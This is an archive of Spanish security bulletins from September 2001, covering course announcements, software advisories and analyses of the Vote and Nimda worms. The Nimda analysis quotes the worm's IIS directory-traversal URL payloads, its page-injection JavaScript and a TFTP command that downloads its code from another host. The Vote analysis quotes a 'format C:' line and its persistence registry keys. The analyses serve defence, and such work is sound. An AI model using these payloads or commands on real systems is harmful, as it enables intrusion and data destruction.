domingo, 30 de septiembre de 2001

Curso de seguridad para desarrolladores y webmasters

Hispasec anuncia un curso sobre programación segura de aplicaciones
Internet, imprescindible para desarrolladores, webmasters, y
administradores que utilicen tecnologías Microsoft.
La robustez de un sitio web no depende en exclusiva de instalar
correctamente el servidor y corregir las continuas vulnerabilidades
que aparecen para su sistema operativo y los servicios instalados.
Muchos ataques e intrusiones a servidores Internet se realizan
a través de las aplicaciones propietarias que soportan las soluciones
finales: páginas web/ASP, scripts, acceso a base de datos,
componentes propietarios, etc. Junto a los administradores, los
desarrolladores y webmasters son responsables directos de la
seguridad del sitio web.

El curso es eminentemente práctico y parte de una aplicación Web
existente que se ha escrito sin tener en cuenta consideraciones de
programación segura. Sobre esta aplicación que presenta las
vulnerabilidades más frecuentes en el mundo real se va trabajando
hasta conseguir una aplicación robusta desde el punto de vista de
seguridad.

Al finalizar el curso los programadores deben ser capaces de
conocer los errores de seguridad más comunes que se cometen al
desarrollar aplicaciones Web así como la manera de evitarlos. Se
hace especial incidencia en las ventajas respecto a la seguridad
de una buen diseño de la aplicación en las tres capas de
presentación, lógica de negocio y datos.

El curso será impartido por dos auténticos especialistas y habituales
en "una-al-día". Gonzalo Álvarez Marañón, Ingeniero de
Telecomunicación y Doctor en Informática, investigador de la seguridad
en Internet del CSIC, y Juan Carlos G. Cuartango, Ingeniero de
Telecomunicación con 20 de años de experiencia en el campo de la
seguridad informática y acreditado especialista de la seguridad en
Internet.

Un detallado programa del curso se encuentra en:
http://www.hispasec.com/formacion/programapro.htm

El comienzo del curso es inminente, los interesados pueden conocer
los detalles e inscribirse en:
http://www.hispasec.com/formacion/inscrippro.htm



Bernardo Quintero
bernardo@hispasec.com


Más información:

Seguridad Internet - Formación especializada
http://www.hispasec.com/formacion/

Curso de desarrollo de aplicaciones Internet seguras
http://www.hispasec.com/formacion/intropro.htm

Curso de seguridad Internet en servidores UNIX
http://www.hispasec.com/formacion/introunix.htm

Curso de seguridad Internet en servidores Windows 2000
http://www.hispasec.com/formacion/intro.htm



sábado, 29 de septiembre de 2001

Consideraciones de seguridad sobre Apache y MacOS X

Bajo MacOS X y Apache, si se cumplen determinadas condiciones, un
atacante puede acceder a cualquier archivo protegido dentro de la
jerarquía de documentos Apache y obtener listado de directorios.
Apache es el servidor web más popular del mundo, con el 60% de
instalaciones en Internet. Se trata de un producto "Open Source" y
disponible para infinidad de plataformas.

Mac OS X es la última versión del sistema operativo de Apple, para sus
equipos Macintosh. Se trata de un sistema microkernel Mach, con una capa
de emulación UNIX encima (concretamente, *BSD) y el conocido entorno
gráfico que tan popular ha hecho a los Macintosh.

MacOS X incluye el soporte del sistema de ficheros HFS+, un sistema
propio de Apple que, entre otras características, no incluye
sensibilidad a las mayúsculas y minúsculas, al igual que ocurre bajo
Windows.

Ello hace que se puedan leer ficheros en el árbol Apache, aunque su
acceso esté prohibido por configuración, sin más que cambiar mayúsculas
y minúsculas en la URL.

La solución para ello es utilizar el módulo "mod_hfs", para reconocer
adecuadamente los ficheros con combinaciones distintas de mayúsculas y
minúsculas, y la directiva "<FilesMatch>" en vez del "<Files>"
comúnmente utilizado. En la directiva "<FilesMatch>" deben emplearse
expresiones regulares para detectar el uso de mayúsculas y minúsculas.
Se verán ejemplos más abajo.

Otra posibilidad sería el uso de particiones UFS para la sensibilidad a
las mayúsculas y minúsculas. Dichas particiones, estándares en Unix, sí
consideran distintos ficheros con diferente combinación de mayúsculas y
minúsculas.

Todo esto es conocido por cualquier administrador de Mac OS X. O debería
serlo.

Existen, sin embargo, un par de detalles adicionales a considerar, poco
conocidos:

a) Mac OS X almacena en cada directorio un fichero ".DS_Store" que,
entre otras cosas, contiene un listado de ficheros en dicho directorio.

Si solicitamos dicho fichero obtendremos un listado de ficheros en el
directorio, aunque hayamos indicado a Apache que no nos muestre esa
información.

Para eliminar este problema, podemos definir una regla de acceso del
tipo:

<FilesMatch "^\.[Dd][Ss]_[Ss]">
Order allow, deny
Deny from all
</FilesMatch>

b) Aunque indiquemos la regla anterior, seguimos pudiendo acceder a los
ficheros en el directorio si tenemos nuestro sistema Mac OS X con la
opción de "búsqueda por contenidos". Con esa opción activada, el sistema
operativo crea un fichero ".FBCIndex" en cada directorio, que consiste
en una base de datos para realizar búsquedas. Ello, además de
proporcionarnos un listado de ficheros, nos puede dar también su
contenido, analizando la base de datos de indexación en sí.

Se puede definir una regla similar:

<FilesMatch "^\.[Ff][Bb][Cc]">
Order allow, deny
Deny from all
</FilesMatch>

c) Si se usa un fichero ".htaccess", debemos recordar que, a menos que
se hayan puesto reglas de exclusión como las anteriores, podemos acceder
a él usando una URL con ".HTACCESS".

Una posible solución para estos problemas, es la de emplear una regla
genérica de la forma:

<FilesMatch "^\.[^.]">
Order allow, deny
Deny from all
</FilesMatch>

Esta regla prohibirá el acceso a cualquier fichero cuyo nombre empiece
con un punto, a menos que su segundo carácter sea también un punto (por
ejemplo, el directorio padre "..").

Este cambio, que incrementa la seguridad enormemente, puede ocasionar
algún problema con el uso de directivas SSI ("Server Side Include"). Los
administradores que hagan estos cambios, que se recomiendan, deben
comprobar el correcto funcionamiento de sus páginas con contenido
activo.



Jesús Cea Avión
jcea@hispasec.com


Más información:

Mac OS X Reader Reports: Part 46
http://www.macintouch.com/mosxreaderreports46.html

More security problems in Apache on Mac OS X
http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=213330&start=2001-09-07&end=2001-09-13



viernes, 28 de septiembre de 2001

Problemas de seguridad en Bugzilla

Las versiones de Bugzilla previas a la 2.14 contienen numerosos
problemas de seguridad.
Bugzilla es un sistema de base de datos para comunicar bugs y asignarlos
a desarrolladores, obteniendo una gran simplificación administrativa
respecto a la gestión manual de bugs. Bugzilla se utiliza en numerosos
proyectos, sobre todo del tipo "Open Source".

Los problemas se concentran, fundamentalmente, en el acceso a datos
confidenciales (especialmente, "bugs" confidenciales) y en la
comprobación y "escape" inadecuada de parámetros bajo el control de un
posible atacante.

Se recomienda a todos los proyectos que empleen Bugzilla que actualicen
cuanto antes a la versión 2.14.



Jesús Cea Avión
jcea@hispasec.com


Más información:

Bugzilla
http://www.mozilla.org/projects/bugzilla/

Bugzilla 2.14 Release Notes
http://www.mozilla.org/projects/bugzilla/release2_14.html

Bugzilla Security Advisory
http://www.mozilla.org/projects/bugzilla/security2_14.html

Bugzilla
http://bugzilla.mozilla.org/



jueves, 27 de septiembre de 2001

Fallo de seguridad en "screen"

Las versiones de "screen" anteriores a la 3.9.10 contienen un problema
de seguridad que permite que un atacante local obtenga privilegios de
administrador o "root".
"screen" es un útil programa que permite multiplexar varias sesiones de
texto a través de una única conexión TCP/IP, conmutando entre unas y
otras mediante una combinación de teclas. Asimismo, se pueden transferir
las sesiones a otra máquina cliente, por ejemplo, de forma transparente
a los programas que estemos utilizando y a las sesiones en sí.

Las versiones previas a la 3.9.10 permiten que un atacante local obtenga
privilegios de superusuario si "screen" está instalado con el flag
SETUID (algo que no se recomienda, aunque ello limita algunas
funcionalidades) y existe un directorio por debajo del directorio
"/tmp/screens/".

El problema radica en la existencia de varios errores en la gestión de
formatos en cadenas bajo el control de un atacante local. Un uso
inteligente de los mismos permite la ejecución de código arbitrario por
parte de un atacante local, con privilegios de superusuario.

Se recomienda actualizar cuanto antes a "screen" versión 3.9.10.
Adicionalmente se recomienda quitar el modo "SETUID" a esta herramienta,
a menos que sea absolutamente necesario. Este hecho apenas menoscaba un
par de funcionalidades, pero se gana en tranquilidad, ya que sin
"SETUID", cualquier fallo de seguridad en "screen" no permitirá
incrementar el nivel de privilegio del usuario.



Jesús Cea Avión
jcea@hispasec.com


Más información:

SCREEN
ftp://ftp.gnu.org/gnu/screen/

SuSE Security Announcement: screen (SuSE-SA:2001:030)
http://www.suse.com/de/support/security/2001_030_screen_txt.txt

screen User Supplied Format String Vulnerability
http://www.securityfocus.com/bid/1641



miércoles, 26 de septiembre de 2001

WTC.EXE, alias "Vote", mucho ruido y pocas nueces

Este nuevo gusano nunca habría saltado desde algunas casas antivirus a
los medios de no ser por las referencias al World Trade Center (las
torres gemelas) y la inminente guerra que parece se avecina, que lo
han convertido en marketing para algunos y en carne de noticia para
otros. Aunque sus efectos dañinos han sido muy anunciados, al fin
y al cabo la parte más fácil de programar y que no le asegura su
distribución masiva, no se esperan infecciones significativas.
"Vote" se ha convertido en objeto de discordia entre las propias casas
antivirus. Mientras que algunas lo situaban en las primeras horas como
"InTheWild" (distribución generalizada), otras lo catalogan ya como
un "hype" (exageración).

En estos momentos la actividad de este gusano en España y en los
países latinos tiende a cero. Al hecho de que se presente en inglés
hay que sumar que se autoenvía en un mensaje de manera muy obvia y
fácil de identificar, con textos fijos y adjuntado como un ejecutable
(WTC.EXE). En principio, EE.UU. es el país donde podría darse la
mayor propagación, ya que simula una encuesta sobre la posible e
inminente guerra. Sin embargo, la simpleza del gusano hace pensar
que no vaya a mayores y que se pueda neutralizar en pocos días.

"Vote Virus" es uno más de esos gusanos que aprovecha Outlook, el
cliente de correo de Microsoft, para distribuirse entre todos los
contactos de la libreta de direcciones. Una vez infectado un sistema,
las acciones más destacadas consisten en intentar eliminar varios
productos antivirus, borrar el directorio de Windows y formatear la
unidad C:. Además, modifica la página de inicio de Internet Explorer
para apuntar a un troyano que una vez instalado roba contraseñas del
sistema infectado.

Aunque a primera vista parezca sofisticado por la cantidad de acciones
dañinas que lleva a cabo, la realidad es otra bien distinta. Escrito
en Visual Basic 5, necesita que el sistema a infectar tenga instalado
el Runtime de Visual Basic (MSVBVM50.DLL) para poder ejecutarse. En
el apartado técnico este gusano no aporta nada, se limita a copiar
otros virus similares, por lo que el autor debería ser catalogado de
nivel mediocre.

Así se presenta

El gusano se presenta en el archivo "WTC.EXE", iniciales del World
Trade Center (las torres gemelas), adjunto en un mensaje de correo
electrónico que simula ser una especie de encuesta sobre la inminente
guerra que se vecina:

Asunto: Fwd:Peace BeTweeN AmeriCa And IsLaM !

Cuerpo: Hi iS iT A waR Against AmeriCa Or IsLaM !?
Let´s Vote To Live in Peace!

Análisis y carga dañina

Al abrir el archivo "WTC.EXE" se infecta el sistema con dos módulos
escritos en Visual Basic Script que se encuentran almacenados dentro
del ejecutable. El primero de ellos, "MixDaLaL.vbs" se copia en el
directorio Windows y se ejecuta de forma inmediata. Su misión consiste
en buscar todos los archivos con extensión .HTM y .HTML, tanto en las
unidades locales como en las de red, y ponerles el siguiente atributo
de oculto después de sobreescribirlos con el texto:

AmeRiCa ...Few Days WiLL Show You What We Can Do !!! It´s Our Turn >>>
ZaCkEr is So Sorry For You.

El segundo de los módulos, "ZaCker.vbs", se ubica en el directorio de
sistema de Windows y se ejecuta cada vez que iniciemos el sistema,
para lo que necesita modificar la siguiente entrada en el registro de
Windows:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
Norton.Thar=C:\WINDOWS\SYSTEM\ZaCker.vbs

La misión de "ZaCker.vbs" consiste en borrar todos los archivos del
directorio Windows, sobreescribe el AUTOEXEC.BAT para que la próxima
vez que se inicie el ordenador lleve a cabo un FORMAT C:, y reinicia
Windows tras mostrar una ventana con el texto:

"I promiss We WiLL Rule The World Again...By The Way,You Are Captured By
ZaCker !!!"

Otras de las acciones del gusano consiste en modificar la página de
inicio de Internet Explorer, de manera que cuando abrimos el navegador
por defecto apuntará a una dirección en Yahoo (us.f1.yahoofs.com) para
bajarse el archivo "TimeUpdate.exe". Este troyano se copia en el
directorio del sistema de Windows con el nombre "MSCTVR32.EXE" y crea
una entrada en el registro de Windows para ejecutarse cada vez que se
inicie el sistema:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
Microsoft MMedia support=MSCTVR32.EXE

La características del troyano son las estándar en este tipo de
especímenes: robar los datos del acceso telefónico a redes (nombres de
usuario, contraseñas y números de teléfonos), números de
identificación del ICQ, abrir puertas traseras, etc.

Como medida de autoprotección y supervivencia, el gusano elimina los
siguientes directorios que se corresponden con la ubicación por
defecto de algunos programas antivirus:

C:\Program Files\AntiVirus Toolkit Pro
C:\eSafeProtect
C:\Program Files\Command Software\F-PROT95
C:\PC-Cillin 95
C:\PC-Cillin 97
C:\Program Files\Quick Heal
C:\Program Files\FWIN32
C:\Program Files\FindVirus
C:\ToolkitFindVirus
C:\f-macro
C:\Program Files\McAfeeVirus\Scan95
C:\Program Files\Norton AntiVirus
C:\TBAVW95
C:\VS95

Prevención y desinfección

La prevención es de lo más sencilla, simplemente deberemos eliminar
cualquier mensaje que nos llegue con el asunto y cuerpo mencionados,
y jamás abrir el archivo adjunto "WTC.EXE". Como regla general,
recordamos el consejo de no abrir archivos adjuntos no solicitados.
La eliminación tampoco presenta mayores problemas. Si hemos ejecutado
por error el archivo "WTC.EXE", deberemos permanecer en Windows, sin
reiniciar el sistema, y con un editor de textos eliminaremos la línea
del AUTOEXEC.BAT que hace referencia al formato de la unidad C:
(echo y ¦ format C:). A continuación ejecutamos la utilidad
REGEDIT.EXE para eliminar las entradas que el gusano introduce en el
registro de Windows, ya comentadas con anterioridad, y que provocan
que se active al iniciar el sistema.

Asimismo, debemos configurar la página inicial de Internet Explorer
con la dirección que deseemos, para evitar que apunte al troyano. Por
último deberemos buscar y eliminar los ejecutables (.EXE) y los
scripts (.VBS) que hemos descrito en este análisis.

Debemos tener en cuenta que el gusano habrá sobrescrito todos los
archivos .HTM y .HTML a su alcance, por lo que deberemos restaurarlos
si contamos con copia de seguridad. Para agilizar la identificación
de los archivos modificados, podemos hacer una búsqueda de los
ficheros *.HTM *.HTML con tamaño máximo de 1 Kb. Otra posibilidad es
que el gusano haya eliminado nuestro antivirus, en tal caso habrá que
instalarlo de nuevo. Los principales antivirus del mercado ya
reconocen a "Vote Virus", por lo que se recomienda a sus usuarios
actualicen los productos.



Bernardo Quintero
bernardo@hispasec.com


Más información:

Vote Virus: un nuevo gusano tan oportunista como dañino
http://iblnews.com/news/noticia.php3?id=21319

Vote-virus (WTC) not widespread
http://www.f-secure.com/v-descs/vote.shtml

World Trade Center worm calls for vote on war
http://www.sophos.com/virusinfo/articles/votea.html

Win32.Vote.A@mm
http://www.avx-es.com/alert/win32.vote.a.php

W32/Vote@MM
http://vil.nai.com/vil/virusSummary.asp?virus_k=99212

W32/Vote
http://service.pandasoftware.es/enciclopedia/ficha.jsp?Virus=W32/Vote

TROJ_VOTE.A
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=TROJ_VOTE.A

W32.Vote.A@mm
http://www.symantec.com/avcenter/venc/data/w32.vote.a@mm.html



martes, 25 de septiembre de 2001

Ataque de denegación de servicio sobre SQUID

Todas las versiones SQUID, incluyendo la actual 2.4.STABLE2, son
susceptibles a un ataque de denegación de servicio. El ataque es
realizable desde cualquier máquina con privilegios para acceder al
servidor SQUID.
SQUID es un servidor de caché para HTTP, FTP, WAIS y GOPHER, "open
source" y muy popular. Se utiliza para reducir el tráfico que circula
por las líneas Internet, y para mejorar la velocidad de respuesta de
cara a los usuarios. Puede ser configurado tanto como un sistema de
proxy/caché tradicional, como caché transparente, configuración que
utilizan varios ISPs de españoles, de grandes proporciones.

Todas las versiones de SQUID, tanto las 2.3 como las 2.4 (lo que incluye
La versión actual descargable del web) son susceptibles a un ataque de
denegación de servicio al intentar realizar una operación "PUT"
especialmente construida sobre un servidor FTP. Cuando el servidor SQUID
recibe la petición, muere.

Aunque el parche está disponible desde el 18 de Septiembre, en el
momento de escribir este boletín todavía no se han actualizado los
parches "hotfix" a aplicar a la versión actual del SQUID, aunque el
parche está disponible en el sistema de seguimiento de "bugs" oficial de
SQUID (vía Bugzilla).

Gracias a tratarse de código "Open Source" podemos aplicar el parche de
forma manual al servidor SQUID, a la espera de la siguiente versión
oficial del servidor. El parche en sí es muy simple:




Index: src/ftp.c
================================================
RCS file: /server/cvs-server/squid/squid/src/ftp.c,v
retrieving revision 1.298.2.4
diff -u -w -r1.298.2.4 ftp.c
- --- src/ftp.c 2001/01/12 00:51:47 1.298.2.4
+++ src/ftp.c 2001/09/18 13:51:25
@@ -2450,8 +2450,10 @@
err->ftp.request = xstrdup(ftpState->ctrl.last_command);
if (ftpState->old_reply)
err->ftp.reply = xstrdup(ftpState->old_reply);
- - else
+ else if (ftpState->ctrl.last_reply)
err->ftp.reply = xstrdup(ftpState->ctrl.last_reply);
+ else
+ err->ftp.reply = xstrdup("");
errorAppendEntry(ftpState->entry, err);
storeBufferFlush(ftpState->entry);
ftpSendQuit(ftpState);





Jesús Cea Avión
jcea@hispasec.com


Más información:

SQUID
http://www.squid-cache.org/

Bugzilla bug 233
http://www.squid-cache.org/bugs/show_bug.cgi?id=233

Parche SQUID
http://www.squid-cache.org/bugs/showattachment.cgi?attach_id=38

Reported Bugs
http://www.squid-cache.org/Versions/v2/2.4/bugs/



lunes, 24 de septiembre de 2001

Curso Seguridad UNIX


Hispasec Sistemas y el Instituto para la Seguridad en Internet (ISI)
han organizado un nuevo curso, eminentemente práctico, dirigido en
esta ocasión a todos aquellos administradores de sistemas UNIX,
donde se ofrece una puesta al día sobre los aspectos de la seguridad
en Internet.
"Seguridad Internet en servidores UNIX (Linux/Solaris)" es un curso
especializado y muy práctico. Los asistentes, que contarán con un
ordenador por persona, documentación en español y CD-ROM con todas
herramientas utilizadas en el curso, realizarán ataques reales
contra Internet con las mismas herramientas utilizadas por los
intrusos (hackers). Cada aspecto se plantea inicialmente desde la
perspectiva del intruso. Una vez comprendido, se mostrará su posible
solución y, lo que es más importante, las medidas preventivas que se
deben adoptar para evitar un ataque.

Otro de los factores a destacar de este curso es la calidad técnica
de sus autores. El curso ha sido diseñado y documentado por
auténticos especialistas en seguridad Internet como son Juan Carlos
Garcia Cuartango, Cristóbal Bielza y Pedro Pablo Pérez, quién,
lo imparte.

El temario puede consultarse en la dirección:

http://www.hispasec.com/formacion/programaunix.htm

Formulario de inscripción:

http://www.hispasec.com/formacion/inscripunix.htm



Bernardo Quintero
bernardo@hispasec.com


Más información:

Curso de Seguridad Internet en servidores UNIX
http://www.hispasec.com/formacion/introunix.htm

Curso de Seguridad Internet en servidores Windows 2000
http://www.hispasec.com/formacion/intro.htm



domingo, 23 de septiembre de 2001

La NSA distribye una nueva revisión de su distribución "segura" SELinux

La NSA (la agencia de seguridad nacional norteamericana) acaba de
publicar una nueva versión de su distribución "segura" SELinux, basada
en el kernel Linux 2.4.9.
SELinux es una distribución de Linux realizada por la NSA para cubrir
las necesidades de un sistema operativo que cumpla los criterios
"Trusted" y disponible en código fuente, y poder así hacer frente a la
eventualidad de que desapareciesen los sistemas actualmente en uso, como
Trusted Solaris (Sun), Trusted AIX (IBM) o Trusted IRIX (SGI, antigua
Silicon Graphics).

SELinux, cuya primera versión pública vió la luz a finales de 2.000, se
distribuye bajo licencia GNU.

Los usuarios de la versión Linux de la NSA deben actualizar su
distribución de forma periódica, preferiblemente de manera frecuente.



Jesús Cea Avión
jcea@hispasec.com


Más información:

Security-Enhanced Linux
http://www.nsa.gov/selinux/

New Release Of NSA SELinux
http://slashdot.org/article.pl?sid=01/08/27/179231&mode=thread

What's New with Security-Enhanced Linux?
http://www.nsa.gov/selinux/news.html

Actualización de la versión Linux de la NSA
http://www.hispasec.com/unaaldia.asp?id=833

La NSA publica una versión "segura" de Linux
http://www.hispasec.com/unaaldia.asp?id=795

GNU General Public License
http://www.gnu.org/copyleft/gpl.html



sábado, 22 de septiembre de 2001

Nuevo informe del CERT

El CERT ha publicado un nuevo informe sobre las vulnerabilidades más
utilizadas recientemente.
Según el CERT, la actividad actual se centra, fundamentalmente, en:

1. Gusanos "Red Code" y similares (Microsoft Windows).

2. Virus autopropagante "SirCam" (Microsoft Windows).

3. Desbordamiento de búfer en "telnetd" (Unix).

4. Desbordamiento de búfer en el demonio "in.lpd" de Solaris.

5. Amenazas a usuarios domésticos, fundamentalmente motivadas por el
despliegue de redes de cable y xDSL.

6. Caballos de troya, fundamentalmente SubSeven y derivados.



Jesús Cea Avión
jcea@hispasec.com


Más información:

CERT® Summary CS-2001-03
http://www.cert.org/summaries/CS-2001-03.html

CERT
http://www.cert.org/

CERT/CC Current Activity
http://www.cert.org/current/current_activity.html



viernes, 21 de septiembre de 2001

Grave vulnerabilidad local de Sendmail

Las versiones de Sendmail previas a la 8.11.6 o la 8.12.0beta19
contienen una vulnerabilidad que permite a un atacante local el ejecutar
código arbitrario como administrador o "root".
Sendmail es el MTA (Mail Transfer Agent; sistema de transporte de
correo) más utilizado en el mundo Unix, con una larga historia y una
gran reputación en términos de estabilidad y potencia.

La vulnerabilidad que afecta a las versiones Sendmail previas a la
8.11.6 o la 8.12.0beta19 reside en la gestión de las opciones de
depuración; se realiza una conversión a un entero con signo, que un
atacante malicioso puede aprovechar para provocar la escritura en una
matriz con un índice negativo, sobreescribiendo memoria de forma no
autorizada.

Este ataque sólo puede realizarse de forma local.

Se recomienda actualizar sendmail a la versión 8.11.6 o a la 8.12.0.



Jesús Cea Avión
jcea@hispasec.com


Más información:

Sendmail Debugger Arbitrary Code Execution Vulnerability
http://www.securityfocus.com/bid/3163

Sendmail Home Page
http://www.sendmail.org/



jueves, 20 de septiembre de 2001

W32/Nimda: llegó, vio e infectó

En la entrega de hoy conoceremos más a fondo a Nimda; de qué formas se
nos puede presentar, cómo intenta infectarnos de manera automática,
cómo prevenir esas infecciones y qué acciones lleva a cabo si logra
ejecutarse en un sistema.
Así nos llega...

Nimda puede atacar a los usuarios de Windows por tres vías diferentes:
por correo electrónico, al visitar una página Web o al estar en una
red local compartiendo recursos con otro ordenador infectado. Además,
tiene una cuarta vía de infección que afecta a los servidores Windows
basados en Internet Information Server.

1) Por correo electrónico

Nimda se autoenvía en un mensaje de correo electrónico con el archivo
"readme.exe" adjunto. Utiliza un formato HTML para explotar una
conocida vulnerabilidad de Internet Explorer, heredada por Outlook y
Outlook Express, de forma que puede ejecutar "readme.exe" sin
necesidad de que el usuario lo abra, basta con previsualizar el
mensaje en el cliente de correo.

Para lograrlo modifica la cabecera MIME que hace referencia a
"readme.exe" indicando que se trata de un archivo tipo audio/x-wav.
De esta forma engaña a Internet Explorer, que lo abre de manera
automática creyendo que se trata de un formato inofensivo, un simple
archivo de sonido. El resultado es el mismo al previsualizar el
mensaje en Outlook y Outlook Express, ya que los clientes de correo
de Microsoft utilizan los módulos de Internet Explorer para
interpretar HTML.


- ---
db 'Content-Type: audio/x-wav;',0Dh,0Ah
db 9,'name="readme.exe"',0Dh,0Ah
db 'Content-Transfer-Encoding: base64',0Dh,0Ah
- ---


2) Infección al visualizar una página Web de un servidor infectado.

La página infectada contiene un código JavaScript que intenta abrir el
archivo "readme.eml" (.EML extensión de mensaje de correo electrónico)
y que explota de igual forma, con el mismo contenido, la
vulnerabilidad que acabamos de comentar para autoejecutar el código
del virus.


- ---
db '<html><script language="JavaScript">window.open("readme.eml"'
db ', null, "resizable=no,top=6000,left=6000")</script></html>',0
- ---


3) En la red local

Una vez que logra infectar un sistema, Nimda recorre todas las
unidades locales y de red e infecta todos los directorios a los que
tiene acceso. Para conseguir propagarse, por un lado crea múltiples
archivos de mensajes de correo electrónico infectados con nombres
aleatorios y cuya extensión es .EML en el 95% de los casos y .NWS en
el 5% restante. Estos mensajes tienen el mismo contenido que los que
hemos descrito en los casos anteriores, por lo que si intentamos
visualizar estos archivos el virus se autoejecutará de manera
automática.

Por otro lado, también en todas las unidades locales y de red, busca
archivos cuyos nombres contengan "default", "index", "main" o "readme"
y cuya extensión sea .HTML, .HTM o .ASP. En estos archivos introduce
el mismo código JavaScript que en el caso (2), de manera que si
alguien visualiza estas páginas Web, "readme.eml" se abrirá
automáticamente y se producirá la infección. También infecta
ejecutables anteponiendo su código.


- ---
push offset default ; "default"
push eax
call ebp ; strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_36173585
lea eax, [esp+160h+var_120]
push offset index ; "index"
- ---


Así, si estamos en una red local donde uno de los equipos ha sido
infectado, podemos contaminarnos al intentar visualizar alguno de los
archivos que crea o modifica, ya sean mensajes de correo electrónico,
páginas Web o algún .EXE infectado. Estos archivos infectados los
podremos encontrar si accedemos a unidades de red, o en las unidades
de nuestro propio equipo si las tenemos compartidas.

Otra manera de infectarse automáticamente en una red local, sin
intentar visualizar algunos de los archivos infectados, sucede cuando
el gusano se ha copiado en la carpeta Inicio de nuestro sistema al
tener nuestra unidad C: totalmente compartida. Esto hace que al
iniciar el sistema el archivo infectado se autoejecute.

4) Infección directa de un servidor Web

Nimda intenta introducirse de forma automática en los servidores Web
basados en Internet Information Server explotando varias
vulnerabilidades a través de peticiones GET vía HTTP, bien buscando
tener acceso al intérprete de comandos, CMD.EXE, o al archivo
ROOT.EXE, un troyano que ya habría sido introducido con anterioridad
al ser infectado por los gusanos Code Red II o Sadmind.


- ---
mov dword ptr [ebp-48h], offset scripts_dir ; "/scripts"
mov dword ptr [ebp-44h], offset MSADC_dir ; "/MSADC"
mov dword ptr [ebp-40h], offset aC_0 ; "/c"
mov dword ptr [ebp-3Ch], offset aD ; "/d"
mov dword ptr [ebp-38h], offset esc_char1 ; "/scripts/..%255c.."
mov dword ptr [ebp-34h], offset esc_char2 ; "/_vti_bin/..%255c../..%255c../..%255c.."
mov dword ptr [ebp-30h], offset esc_char3 ; "/_mem_bin/..%255c../..%255c../..%255c.."
mov dword ptr [ebp-2Ch], offset esc_char4 ; "/msadc/..%255c../..%255c../..%255c/..%c"...
mov dword ptr [ebp-28h], offset unicode_1 ; "/scripts/..%c1%1c.."
mov dword ptr [ebp-24h], offset unicode_2 ; "/scripts/..%c0%2f.."
mov dword ptr [ebp-20h], offset unicode_3 ; "/scripts/..%c0%af.."
mov dword ptr [ebp-1Ch], offset unicode_4 ; "/scripts/..%c1%9c.."
mov dword ptr [ebp-18h], offset aScripts__3563_ ; "/scripts/..%%35%63.."
mov dword ptr [ebp-14h], offset aScripts__35c__ ; "/scripts/..%%35c.."
mov dword ptr [ebp-10h], offset aScripts__25356 ; "/scripts/..%25%35%63.."
mov dword ptr [ebp-0Ch], offset aScripts__252f_ ; "/scripts/..%252f.."
- ---


Si el servidor es vulnerable a algunos de los ataques que Nimda lleva
a cabo, aprovecha para ejecutar una sesión de TFTP y así descarga en
el servidor Web el archivo ADMIN.DLL, que contiene el código vírico.
Este archivo se copiará en las unidades C:, D: y E:


- ---
TFTP_GET db 'tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20',0
- ---


Más vale prevenir...

Clientes (casos 1, 2 y 3)

Para evitar que Nimda pueda explotar la vulnerabilidad de Internet
Explorer, e impedir así que se ejecute de forma automática el archivo
"readme.exe" al visualizar un mensaje infectado, debemos tener nuestro
navegador correctamente actualizado.

Las versiones vulnerables son Internet Explorer 5.01 y 5.5 que no
tengan instalado el Service Pack 2 o la actualización específica que
Microsoft distribuyó para este problema. Los usuarios de Internet
Explorer 6 no tienen que instalar ningún parche, no están afectados
por esta vulnerabilidad.

Esta vulnerabilidad, descubierta por Cuartango, fue corregida por
Microsoft, que facilitó un parche específico para ella. En lugar de
ese parche, recomendamos instalar una actualización acumulativa
posterior donde ya se corrigen otras vulnerabulidades además de la
que hoy nos ocupa:

Internet Explorer 5.01
http://www.microsoft.com/windows/ie/download/critical/q295106/default.asp

Internet Explorer 5.5
http://www.microsoft.com/windows/ie/download/critical/q299618/default.asp

Si tenemos el Internet Explorer correctamente actualizado, evitaremos
que Nimda pueda infectarnos de forma automática, con tan sólo
visualizar el mensaje en el que nos llega. Sin embargo, este parche
no debe darnos una falsa sensación de seguridad total contra Nimda,
ya que nos infectaríamos si abrimos el archivo adjunto.

Por tanto, una vez más, debemos seguir recordando la regla de oro de
no abrir archivos adjuntos no solicitados.

Servidores (caso 4)

En servidores Windows, Nimda explota varias vulnerabilidades, en
especial las relacionadas con la escalada de directorios a través de
caracteres Unicode en la URL.

Para lograr una protección contra todas las vulnerabilidades que
intenta explotar, lo mejor es instalar el último parche acumulativo
disponible según versión en:

IIS 4.0
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32061

IIS 5.0
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32011

Asimismo, no debemos olvidar inspeccionar nuestro servidor en busca de
troyanos, remanentes de una infección previa del Code Red y a los que
Nimda intenta acceder para lograr la infección.

Así infecta un sistema cuando logra ejecutarse...

Además de las acciones que ya hemos ido comentando, Nimda se copia
como "mmc.exe" en el directorio de Windows, como "load.exe" en el
directorio de sistemas, sobreescribe la biblioteca "riched20.dll" del
directorio de sistema y realiza una copia de la biblioteca infectada
en todos los directorios que contengan documentos (.doc). Por último,
se copia repetidas veces en el directorio temporal de Windows con
nombres de archivo aleatorios que empiezan por "mep" o "ma" y
terminan con las extensiones .TMP o .TMP.EXE.

"riched20.dll" es una biblioteca de Windows que utilizan los
procesadores de texto como Word o WordPad. La sustitución de esta
biblioteca por una infectada hace que el Nimda se ejecute cada vez
que se utilice uno de estos procesadores de texto.

Asimismo se asegura su ejecución mediante una modificación en el
system.ini:

[boot]
shell=explorer.exe load.exe -dontrunold

A continuación modifica una entrada en el registro de Windows para
que en el próximo inicio de sistema todas las unidades estén
compartidas:

HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\[C$ -> Z$]

En Windows 9x/Me las unidades estarán compartidas sin ninguna clave de
acceso, mientras que en Windows NT/2000 a la cuenta GUEST le da
derechos de los grupos Administrators (máximos privilegios) y Guests
(invitados).

En Windows NT/2000 elimina la clave que instaura la seguridad para
compartir de recursos:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\Share\Security

Otras claves son creadas o modificadas para ocultar archivos y
extensiones:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
